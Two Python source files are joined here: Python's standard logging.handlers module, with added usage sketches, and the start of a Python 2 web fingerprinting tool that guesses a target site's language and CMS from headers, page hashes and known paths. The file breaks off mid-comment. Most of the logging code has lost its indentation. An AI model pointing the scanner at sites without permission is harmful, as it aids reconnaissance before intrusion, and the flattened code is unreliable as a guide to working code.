else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
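# Usage sketch (illustrative only): rotate at midnight and keep a week of
# backups; each rotated file receives the "%Y-%m-%d" suffix computed above.
def _timed_rotating_file_handler_example():
    logger = logging.getLogger("timed-example")  # hypothetical logger name
    handler = TimedRotatingFileHandler("app.log", when="midnight", backupCount=7)
    logger.addHandler(handler)
    logger.info("rotated into app.log.YYYY-MM-DD once a day")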
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
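# Usage sketch (illustrative only): on Unix hosts whose log files are rotated
# externally (for example by logrotate), WatchedFileHandler reopens the file
# whenever its device or inode changes, so records never land in the
# rotated-away file. The path below is hypothetical.
def _watched_file_handler_example():
    handler = WatchedFileHandler("/var/log/myapp/app.log")  # hypothetical path
    logging.getLogger("watched-example").addHandler(handler)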
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
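# Receiver-side sketch (illustrative, assumes a plain TCP listener of your
# own): each payload produced by makePickle() above is a 4-byte big-endian
# length prefix followed by a pickled LogRecord __dict__, which
# logging.makeLogRecord can turn back into a LogRecord. "connection" is a
# hypothetical connected socket.
def _decode_socket_handler_payload(connection):
    header = connection.recv(4)
    if len(header) < 4:
        return None
    (length,) = struct.unpack(">L", header)
    data = b""
    # Keep reading until the full pickled payload has arrived.
    while len(data) < length:
        chunk = connection.recv(length - len(data))
        if not chunk:
            return None
        data += chunk
    return logging.makeLogRecord(pickle.loads(data))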
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
# Moreover, we ignore these errors while logging, so it is no worse
# to ignore them here as well.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
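# Usage sketch (illustrative only, Unix-centric): talk to the local syslog
# daemon through its datagram socket; "/dev/log" is the conventional path on
# Linux and may differ on other platforms.
def _syslog_handler_example():
    handler = SysLogHandler(address="/dev/log", facility=SysLogHandler.LOG_LOCAL0)
    logging.getLogger("syslog-example").addHandler(handler)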
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is 5.0 seconds, as in the constructor signature).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Override this in a subclass if needed.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host, context=self.context)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
# See issue #30904: putrequest call above already adds this header
# on Python 3.x.
# h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
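# Usage sketch (illustrative only): POST each record's attribute dict to a
# collector endpoint; the host and path below are hypothetical.
def _http_handler_example():
    handler = HTTPHandler("logs.example.com:8080", "/ingest", method="POST",
                          secure=False)
    logging.getLogger("http-example").addHandler(handler)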
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer = []
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
# See Issue #26559 for why this has been added
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.acquire()
try:
self.target = target
finally:
self.release()
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
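# Usage sketch (illustrative only): buffer everything in memory and only write
# it out when an ERROR-or-higher record arrives, so quiet runs stay quiet but
# failures come with their preceding context. The file path is hypothetical.
def _memory_handler_example():
    target = logging.FileHandler("errors-with-context.log")  # hypothetical path
    buffering = MemoryHandler(capacity=200, flushLevel=logging.ERROR, target=target)
    logger = logging.getLogger("memory-example")
    logger.addHandler(buffering)
    logger.debug("buffered silently")
    logger.error("this flushes the buffered debug record too")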
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also returns the formatted
# message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info and exc_text attributes, as they are no longer
# needed and, if not None, will typically not be pickleable.
msg = self.format(record)
# bpo-35726: make copy of record to avoid affecting other handlers in the chain.
record = copy.copy(record)
record.message = msg
record.msg = msg
record.args = None
record.exc_info = None
record.exc_text = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
if has_task_done:
q.task_done()
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
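# Pairing sketch (illustrative only): QueueHandler on the producing side and a
# QueueListener draining the queue on a background thread, so slow handlers do
# not block the threads that emit records.
def _queue_logging_example():
    log_queue = queue.Queue()
    listener = QueueListener(log_queue, logging.StreamHandler(),
                             respect_handler_level=True)
    listener.start()
    logger = logging.getLogger("queue-example")
    logger.addHandler(QueueHandler(log_queue))
    logger.warning("handled on the listener's thread")
    listener.stop()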
|
FingerprintIdentifier.py
|
import requests
import lib.fingerprint.FingerprintLoader
import lib.controller.FunctionLib
import re
import threading
import hashlib
import Queue as queue  # Python 2 name of the stdlib queue module
import socket
import sys
import urllib2
import time
# Debug options.
# Make sure you know what you are doing.
# todo: Change mode after debug
debug = False
class FingerprintIdentifier():
def __init__(self):
self.site = None
self.url = None
self._FingerprintLoader = lib.fingerprint.FingerprintLoader.FingerprintLoader()
self._counter = 0
self.RawResp = None
self.CMS = []
self.WAF = []
self.OperatingSystem = []
self.Database = []
self.SiteLanguage = None
self._thread = 10
self._CMSVerison = []
self._ThreadLock = False
self._Time = 0
self.StopFlag = False
def CheckMode(self,mode):
if mode == 'tmp':
self.url = self.site
return
def CheckSiteFingerprint(self):
try:
self.RawResp = requests.get('http://%s/' %(self.url))
self.SiteLanguage = self.CheckSiteLanguage()
self.CMS = self.CheckSiteCMS()
except Exception, e:
print '[!] Failed to check fingerprint: %s' %(str(e))
print sys.exc_info()[0]
pass
def CheckSiteLanguage(self):
self.RawResp = requests.get('http://%s/' % (self.url))
HeadersText = ''
for item in self.RawResp.headers.keys():
HeadersText += str(item)
HeadersText += ':'
HeadersText += self.RawResp.headers[item]
HeadersText += '\n'
if re.findall('asp|aspx|iis|microsoft|windows server',HeadersText, re.I+re.M):
self.SiteLanguage = 'dotnet'
elif re.findall('php',HeadersText, re.I+re.M):
self.SiteLanguage = 'php'
elif re.findall('jsp|coyote|tomcat|java',HeadersText, re.I+re.M):
self.SiteLanguage = 'jsp'
else:
self.SiteLanguage = 'other'
if self.SiteLanguage:
print '[+] Language of %s is %s' %(str(self.url), self.SiteLanguage)
else:
print '[*] No language found.'
print '[+] Language check complete.'
return self.SiteLanguage
def LoadFingerprint(self):
try:
self._FingerprintLoader.Language = self.SiteLanguage
FingerprintList = self._FingerprintLoader.LoadSiteFingerprint()
except Exception,e:
print '[!] Error loading fingerprint: %s' %(str(e))
FingerprintList = None
return FingerprintList
def CheckSiteCMS(self):
self.StopFlag = False
self.SiteLanguage = self.CheckSiteLanguage()
CMSFingerprints = self.LoadFingerprint()
CMSList = []
if not CMSFingerprints:
return None
HashList = CMSFingerprints['hashes']
PageList = CMSFingerprints['pages']
HeaderList = CMSFingerprints['headers']
try:
Timer = threading.Thread(target=self._Timer)
Timer.setDaemon(True)
Counter = threading.Thread(target=self._ThreadCounter)
Counter.setDaemon(True)
Timer.start()
Counter.start()
self.CheckHash(HashList)
self.CheckPage(PageList)
self.CheckHeader(HeaderList)
if self.CMS:
if len(self.CMS):
print '[+] %s potential CMS found: ' % (str(len(self.CMS)))
for item in self.CMS:
print '[+] Potential CMS: %s' %(str(item))
else:
print '[*] How do you see this?' # If you see this, Hello.
else:
print '[*] CMS not found.'
except KeyboardInterrupt:
print '[*] Stopped.'
except Exception, e:
print '[!] Failed to check CMS: %s' %(str(e))
print '[+] CMS check completed.'
self.StopFlag = True
return self.CMS
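# Note on the fingerprint data handed to the three checkers below (inferred
# from how each record is split on '|'; the records themselves come from
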